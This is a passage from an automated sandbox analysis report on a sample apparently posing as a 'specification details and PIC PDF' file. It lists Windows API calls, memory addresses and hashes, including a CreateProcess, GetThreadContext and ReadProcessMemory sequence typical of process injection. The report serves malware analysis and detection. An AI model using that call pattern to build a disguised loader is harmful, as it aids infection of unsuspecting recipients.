                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_
                                      • String ID:
                                      • API String ID: 1144537725-0
                                      • Opcode ID: 479063e9bf2ded4a38775040919a20883133f77ce05cb1ccf8e525e7a731b788
                                      • Instruction ID: 59260fe21fd03ae885b42e440f893e1e971514840fd5df7917118305bca3925b
                                      • Opcode Fuzzy Hash: 479063e9bf2ded4a38775040919a20883133f77ce05cb1ccf8e525e7a731b788
                                      • Instruction Fuzzy Hash: 8931A0B0904700CFC726DF24D841697BBE8FF48308F00092EF69A8A252E7717948CB96
                                      APIs
                                      • IsThemeActive.UXTHEME ref: 00343A73
                                        • Part of subcall function 00343ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00343AF3
                                        • Part of subcall function 00343ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00343B08
                                        • Part of subcall function 00343D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00343AA3,?), ref: 00343D45
                                        • Part of subcall function 00343D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00343AA3,?), ref: 00343D57
                                        • Part of subcall function 00343D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00401148,00401130,?,?,?,?,00343AA3,?), ref: 00343DC8
                                        • Part of subcall function 00343D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00343AA3,?), ref: 00343E48
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00343AB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                      • String ID:
                                      • API String ID: 1550534281-0
                                      • Opcode ID: c550c6dda1aac459184dbf5dbaafdacec2606b5fb08a4b81f3ad2db9f928b620
                                      • Instruction ID: 3cacd87a92678e114a1689020a20fe00814a8209c427fb203c6243a7554d3544
                                      • Opcode Fuzzy Hash: c550c6dda1aac459184dbf5dbaafdacec2606b5fb08a4b81f3ad2db9f928b620
                                      • Instruction Fuzzy Hash: 40119D719043419BC302EF29E94591EFBE9EB95710F00892EF9859B2B2DB709544CB96
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,00367A85), ref: 00361CB1
                                      • GetLastError.KERNEL32(00000000,?,00367A85), ref: 00361CC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 485612231-0
                                      • Opcode ID: 2751e33173021582eb8bfcd205bc0c8e22b57be96327a4a4e3b3651cf7eff2e6
                                      • Instruction ID: c6593057e145ec7e352516467799b17bff5d216ea2cbbd9cb237053902eb07a9
                                      • Opcode Fuzzy Hash: 2751e33173021582eb8bfcd205bc0c8e22b57be96327a4a4e3b3651cf7eff2e6
                                      • Instruction Fuzzy Hash: 45E0C271444704ABDB136FB5FD09B9A3B9DEF00344F148434F508DA074D7359940CB84
                                      APIs
                                      • CloseHandle.KERNELBASE(00000000,003EEEF4,00000000,?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAEC
                                      • GetLastError.KERNEL32(?,00376041,003EEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0036EAF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseErrorHandleLast
                                      • String ID:
                                      • API String ID: 918212764-0
                                      • Opcode ID: 3d8685fd62bd5e85758eb6e5f2f754eafaa6cbc77a29df7a3e364535d815cd25
                                      • Instruction ID: b79bbe0b6c77423de21efbb4bf6d388d0349747259c70c501b9322b1aba008e0
                                      • Opcode Fuzzy Hash: 3d8685fd62bd5e85758eb6e5f2f754eafaa6cbc77a29df7a3e364535d815cd25
                                      • Instruction Fuzzy Hash: 3C01B13660C12016D3271674A90EF3E3B4D9F81734F2BC619F506AF1CADE74E844C292
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 020E1A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 020E1AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 020E1B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                      • Instruction ID: 94acf7ab51c5fb67a63ea029fd0e58089565ed957671b6a6b603b06d04d5490b
                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                      • Instruction Fuzzy Hash: 6412DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0034E959
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessagePeek
                                      • String ID:
                                      • API String ID: 2222842502-0
                                      • Opcode ID: 42c876c6c4610fc5b870e7a0101d308e6c8a914c54ae95eb32465eaf565e5167
                                      • Instruction ID: 0178c015eeaf32ded03a2a5228050493e8edb286f60231dc63d03f7c0b3ae78d
                                      • Opcode Fuzzy Hash: 42c876c6c4610fc5b870e7a0101d308e6c8a914c54ae95eb32465eaf565e5167
                                      • Instruction Fuzzy Hash: 0D71E7709043808FEB27CF24C8897AA7BD0FB55308F09497DE9859F6A1D775E885CB92
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: caa0e8b1249b37d3a9230b38b7099c862c0ac9f721d33d6b7dff09cc215d47ad
                                      • Instruction ID: e192702c67735783678cbbf17ae024b91eddb37d103197d99871131619888f2a
                                      • Opcode Fuzzy Hash: caa0e8b1249b37d3a9230b38b7099c862c0ac9f721d33d6b7dff09cc215d47ad
                                      • Instruction Fuzzy Hash: 57413A705046518FDB26CF14C484F1ABBE0AF45308F1989ACE99A4B762D772E849CF52
                                      APIs
                                        • Part of subcall function 00367EEB: GetStartupInfoW.KERNEL32(?), ref: 00367EF5
                                      • GetCommandLineW.KERNEL32(003F6C70,00000014), ref: 00365E9D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CommandInfoLineStartup
                                      • String ID:
                                      • API String ID: 582193876-0
                                      • Opcode ID: 9ddbf65577be3c7ef3d51b837037e5ec18c67087baa05c2e7e68fc1f730aa886
                                      • Instruction ID: bd64d7302233c97d28072c363ca772d64044f2ef9b33e2d0f0ad81d90169b1f8
                                      • Opcode Fuzzy Hash: 9ddbf65577be3c7ef3d51b837037e5ec18c67087baa05c2e7e68fc1f730aa886
                                      • Instruction Fuzzy Hash: 3521C170644B01CADB337BB09906BAA22A45F10705F15C47AF608DE1CFEFBA8A4086A5
                                      APIs
                                        • Part of subcall function 00344214: FreeLibrary.KERNEL32(00000000,?), ref: 00344247
                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003439FE,?,00000001), ref: 003441DB
                                        • Part of subcall function 00344291: FreeLibrary.KERNEL32(00000000), ref: 003442C4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Library$Free$Load
                                      • String ID:
                                      • API String ID: 2391024519-0
                                      • Opcode ID: 7e09b872e479f1626287d79df004297ab0f3d33dc6bd3f6db502e5506c4d6f25
                                      • Instruction ID: 4a53259bae3e94d5973cc2a1933e9ec285647a9e29df0ce6119266d1f56be60a
                                      • Opcode Fuzzy Hash: 7e09b872e479f1626287d79df004297ab0f3d33dc6bd3f6db502e5506c4d6f25
                                      • Instruction Fuzzy Hash: C3119131600306AADB12AF64DC06FAEB7E99F40704F108839B596AE1C1DAB0EA019B60
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: bf351bd0e88226d590a329d825818db77224d635940c0a8acbae044e08b6ff0d
                                      • Instruction ID: e8e46a508d30d28be1e8a3a0f213303849dbf69df362916e65095733b2bdddaf
                                      • Opcode Fuzzy Hash: bf351bd0e88226d590a329d825818db77224d635940c0a8acbae044e08b6ff0d
                                      • Instruction Fuzzy Hash: 482105705086018FDB2ADF68C444F2ABBF1BF85305F154968EA9A4B672D732F849CF52
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000001,00000000,?,?,0035F507,?,0000000E), ref: 0036399F
                                        • Part of subcall function 0036821F: GetModuleFileNameW.KERNEL32(00000000,00400312,00000104,00000000,00000001,00000000), ref: 003682B1
                                        • Part of subcall function 00361145: ExitProcess.KERNEL32 ref: 00361154
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AllocateExitFileHeapModuleNameProcess
                                      • String ID:
                                      • API String ID: 1715456479-0
                                      • Opcode ID: 705abbbf2e386952675c519abe07c641d4f29fe37a3b30bdc952da5811981161
                                      • Instruction ID: 1b835ed1e0892a040fdc324af367b75f3a70c1d7723df7ddb4bef3d5a4496868
                                      • Opcode Fuzzy Hash: 705abbbf2e386952675c519abe07c641d4f29fe37a3b30bdc952da5811981161
                                      • Instruction Fuzzy Hash: 740192312456119AE6233B25DC52B2A23989F82764F668129F5059F19ADFB09D008AA4
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,?,?,?,003439FE,?,00000001), ref: 00344286
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: 39fa9981de06a93b15be2e62badf58e7912cbdca606e5f8c809bfc90f9059469
                                      • Instruction ID: ec1b4338cb55a84b8ac311628bfcc447754d681fa04ed7c35a3a13358e10eea5
                                      • Opcode Fuzzy Hash: 39fa9981de06a93b15be2e62badf58e7912cbdca606e5f8c809bfc90f9059469
                                      • Instruction Fuzzy Hash: 47F01571505702CFCB369F64D890916BBF8AF043253258E3EF1D68AA20C7B2A940DB50
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003440C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: ee69971e4b2443b28b2b3fa473fa593628f179f5cf052b06e642c30e9364191c
                                      • Instruction ID: e72b43b52f49486ea24cd74f53a5807249b9cea5c9b846ecdcf35404df50c3f4
                                      • Opcode Fuzzy Hash: ee69971e4b2443b28b2b3fa473fa593628f179f5cf052b06e642c30e9364191c
                                      • Instruction Fuzzy Hash: 55E072326002241BC712A658CC42FEA73ACDF887A0F0900B0F908EB208DAA0A9818690
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 003BB32A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: PathTemp
                                      • String ID:
                                      • API String ID: 2920410445-0
                                      • Opcode ID: 1a2c66320ee2d74bdfa39a8934756a69be963a306ee7c9dab24bf8ad936b0633
                                      • Instruction ID: 1f352cfec4b577893783c362b79e75336e9fbe2815b6dc0c67ac3343e959161d
                                      • Opcode Fuzzy Hash: 1a2c66320ee2d74bdfa39a8934756a69be963a306ee7c9dab24bf8ad936b0633
                                      • Instruction Fuzzy Hash: D6C04CB0501A5A9BD6539B50CD959F8776C9B00B05F0400E56205E5560DA706B818F11
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 1b33f636a489534e9f272f4cd10c3eb9792c70344f2f4ff0065624850fdaaf2c
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: A4310470A00105DFC71ADF18C490A69FBF6FF49341B6586A5E819CB666DB30EEC5CB80
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 020E22B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction ID: 497343ca0ce80a313152849f22ec9c5d49718037a72df7e27d38f8c8aa7549da
                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction Fuzzy Hash: 36E0BF7494020EEFDB00EFA4D5496DE7BB4EF04312F1005A5FD05D7680DB309E549A62
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 020E22B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6130076775.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20e0000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 20c1c9c3a699210a72cff74d408814a40b56f0b1838b94129548a427d99a605c
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 1EE0E67494020EEFDB00EFB4D54969E7FB4EF04302F100165FD01D2280D6309D509A72
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00367F51
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00367F65
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00367F78
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00367F8B
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00367F9E
                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00367FB1
                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00367FC4
                                      • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00367FD7
                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00367FEA
                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00367FFD
                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00368010
                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00368023
                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00368036
                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00368049
                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0036805C
                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0036806F
                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00368082
                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00368095
                                      • GetProcAddress.KERNEL32(00000000,GetLogicalProcessorInformation), ref: 003680A8
                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 003680BB
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003680CE
                                      • GetProcAddress.KERNEL32(00000000,EnumSystemLocalesEx), ref: 003680E1
                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 003680F4
                                      • GetProcAddress.KERNEL32(00000000,GetDateFormatEx), ref: 00368107
                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0036811A
                                      • GetProcAddress.KERNEL32(00000000,GetTimeFormatEx), ref: 0036812D
                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultLocaleName), ref: 00368140
                                      • GetProcAddress.KERNEL32(00000000,IsValidLocaleName), ref: 00368153
                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00368166
                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00368179
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CloseThreadpoolTimer$CloseThreadpoolWait$CompareStringEx$CreateSemaphoreExW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$EnumSystemLocalesEx$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetDateFormatEx$GetLocaleInfoEx$GetLogicalProcessorInformation$GetTimeFormatEx$GetUserDefaultLocaleName$InitializeCriticalSectionEx$IsValidLocaleName$LCMapStringEx$SetDefaultDllDirectories$SetThreadStackGuarantee$SetThreadpoolTimer$SetThreadpoolWait$WaitForThreadpoolTimerCallbacks$kernel32.dll
                                      • API String ID: 667068680-6251324
                                      • Opcode ID: 8444a0105ff384f2d43a955caf0fe93b7b2cddd97825f7569fe4e3e7d09ca5d6
                                      • Instruction ID: 28ccae217e1b5c27cf317f45cdc1b9e818b199dee3a7175fcef28706ef454a2f
                                      • Opcode Fuzzy Hash: 8444a0105ff384f2d43a955caf0fe93b7b2cddd97825f7569fe4e3e7d09ca5d6
                                      • Instruction Fuzzy Hash: 655108B1950668AAC702AFB5EE49E66BBACBB55B01744086FF104E35B0D7F4A400CF96
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 003AF87D
